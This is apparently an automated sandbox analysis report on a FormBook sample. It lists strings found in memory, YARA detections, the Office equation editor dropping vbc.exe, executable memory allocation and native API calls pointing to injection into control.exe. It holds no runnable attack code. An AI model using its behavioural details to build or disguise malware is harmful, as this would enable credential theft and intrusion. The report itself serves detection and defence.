Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2157511014.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00405042

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181D0 NtCreateFile,		5_2_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418280 NtReadFile,		5_2_00418280
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418300 NtClose,		5_2_00418300
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183B0 NtAllocateVirtualMemory,		5_2_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041827B NtCreateFile,		5_2_0041827B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182FD NtClose,		5_2_004182FD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004183AB NtAllocateVirtualMemory,		5_2_004183AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009700C4 NtCreateFile,LdrInitializeThunk,		5_2_009700C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00970048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00970048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00970078 NtResumeThread,LdrInitializeThunk,		5_2_00970078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009707AC NtCreateMutant,LdrInitializeThunk,		5_2_009707AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096F9F0 NtClose,LdrInitializeThunk,		5_2_0096F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096F900 NtReadFile,LdrInitializeThunk,		5_2_0096F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0096FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0096FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0096FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0096FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0096FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0096FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0096FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0096FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0096FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0096FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0096FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009710D0 NtOpenProcessToken,		5_2_009710D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00970060 NtQuerySection,		5_2_00970060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009701D4 NtSetValueKey,		5_2_009701D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097010C NtOpenDirectoryObject,		5_2_0097010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00971148 NtOpenThread,		5_2_00971148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096F8CC NtWaitForSingleObject,		5_2_0096F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00971930 NtSetContextThread,		5_2_00971930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096F938 NtWriteFile,		5_2_0096F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FAB8 NtQueryValueKey,		5_2_0096FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FA20 NtQueryInformationFile,		5_2_0096FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FA50 NtEnumerateValueKey,		5_2_0096FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FBE8 NtQueryVirtualMemory,		5_2_0096FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FB50 NtCreateKey,		5_2_0096FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FC30 NtOpenProcess,		5_2_0096FC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00970C40 NtGetContextThread,		5_2_00970C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FC48 NtSetInformationFile,		5_2_0096FC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00971D80 NtSuspendThread,		5_2_00971D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096FD5C NtEnumerateKey,		5_2_0096FD5C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020600C4 NtCreateFile,LdrInitializeThunk,		7_2_020600C4
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020607AC NtCreateMutant,LdrInitializeThunk,		7_2_020607AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_0205FAB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_0205FAD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_0205FAE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FB50 NtCreateKey,LdrInitializeThunk,		7_2_0205FB50
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_0205FB68
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_0205FBB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205F900 NtReadFile,LdrInitializeThunk,		7_2_0205F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205F9F0 NtClose,LdrInitializeThunk,		7_2_0205F9F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_0205FED0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FFB4 NtCreateSection,LdrInitializeThunk,		7_2_0205FFB4
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_0205FC60
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FD8C NtDelayExecution,LdrInitializeThunk,		7_2_0205FD8C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_0205FDC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02060048 NtProtectVirtualMemory,		7_2_02060048
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02060060 NtQuerySection,		7_2_02060060
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02060078 NtResumeThread,		7_2_02060078
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020610D0 NtOpenProcessToken,		7_2_020610D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206010C NtOpenDirectoryObject,		7_2_0206010C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02061148 NtOpenThread,		7_2_02061148
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020601D4 NtSetValueKey,		7_2_020601D4
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FA20 NtQueryInformationFile,		7_2_0205FA20
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FA50 NtEnumerateValueKey,		7_2_0205FA50
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FBE8 NtQueryVirtualMemory,		7_2_0205FBE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205F8CC NtWaitForSingleObject,		7_2_0205F8CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02061930 NtSetContextThread,		7_2_02061930
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205F938 NtWriteFile,		7_2_0205F938
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FE24 NtWriteVirtualMemory,		7_2_0205FE24
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FEA0 NtReadVirtualMemory,		7_2_0205FEA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FF34 NtQueueApcThread,		7_2_0205FF34
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FFFC NtCreateProcessEx,		7_2_0205FFFC
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FC30 NtOpenProcess,		7_2_0205FC30
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02060C40 NtGetContextThread,		7_2_02060C40
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FC48 NtSetInformationFile,		7_2_0205FC48
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FC90 NtUnmapViewOfSection,		7_2_0205FC90
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0205FD5C NtEnumerateKey,		7_2_0205FD5C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02061D80 NtSuspendThread,		7_2_02061D80
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_000981D0 NtCreateFile,		7_2_000981D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00098280 NtReadFile,		7_2_00098280
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00098300 NtClose,		7_2_00098300
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_000983B0 NtAllocateVirtualMemory,		7_2_000983B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009827B NtCreateFile,		7_2_0009827B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_000982FD NtClose,		7_2_000982FD
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_000983AB NtAllocateVirtualMemory,		7_2_000983AB

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_0040323C

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404853		4_2_00404853
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406131		4_2_00406131
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73001A98		4_2_73001A98
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C87B		5_2_0041C87B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401174		5_2_00401174
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BA9A		5_2_0041BA9A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C6B		5_2_00408C6B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70		5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CC9C		5_2_0041CC9C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C548		5_2_0041C548
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BDD4		5_2_0041BDD4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87		5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C7AF		5_2_0041C7AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097E0C6		5_2_0097E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009AD005		5_2_009AD005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099905A		5_2_0099905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00983040		5_2_00983040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097E2E9		5_2_0097E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A21238		5_2_00A21238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A263BF		5_2_00A263BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A63DB		5_2_009A63DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097F3CF		5_2_0097F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00982305		5_2_00982305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00987353		5_2_00987353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009CA37B		5_2_009CA37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00991489		5_2_00991489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009B5485		5_2_009B5485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009BD47D		5_2_009BD47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099C5F0		5_2_0099C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098351F		5_2_0098351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C6540		5_2_009C6540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00984680		5_2_00984680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098E6C1		5_2_0098E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A22622		5_2_00A22622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009CA634		5_2_009CA634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098C7BC		5_2_0098C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0579A		5_2_00A0579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009B57C3		5_2_009B57C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1F8EE		5_2_00A1F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098C85C		5_2_0098C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A286D		5_2_009A286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009829B2		5_2_009829B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A2098E		5_2_00A2098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009969FE		5_2_009969FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A05955		5_2_00A05955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A33A83		5_2_00A33A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A2CBA4		5_2_00A2CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097FBD7		5_2_0097FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0DBDA		5_2_00A0DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A7B00		5_2_009A7B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1FDDD		5_2_00A1FDDD
